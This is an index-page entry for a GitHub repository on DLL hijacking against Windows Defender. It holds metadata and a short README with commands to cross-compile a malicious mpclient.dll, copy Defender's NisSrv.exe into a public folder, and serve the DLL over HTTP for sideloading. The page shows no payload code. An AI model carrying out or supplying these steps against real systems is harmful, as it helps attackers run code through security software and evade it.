Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/cybersecurityup/windows-defender-dll-hijacking
https://github.com/cybersecurityup/windows-defender-dll-hijacking
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/cybersecurityup/windows-defender-dll-hijacking
- Owner: CyberSecurityUP
- Created: 2022-08-04T20:12:35.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-12-21T05:06:25.000Z (about 1 year ago)
- Last Synced: 2023-12-21T07:52:39.059Z (about 1 year ago)
- Language: C++
- Size: 36.1 KB
- Stars: 17
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Windows-Defender-DLL-Hijacking
## Linux Compilation
Commands:
sudo apt-get update && sudo apt-get install gcc-mingw-w64-x86-64 g++-mingw-w64-x86-64 wine64
x86_64-w64-mingw32-g++ --shared -o mpclient.dll mpclient.cpp
## Attack
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" "C:\Users\Public\DLL Hijacking"
python3 -m http.server 80
Download Dll in folder with Nissrv
## Special thanks
Los3rPWN for Proof of Concept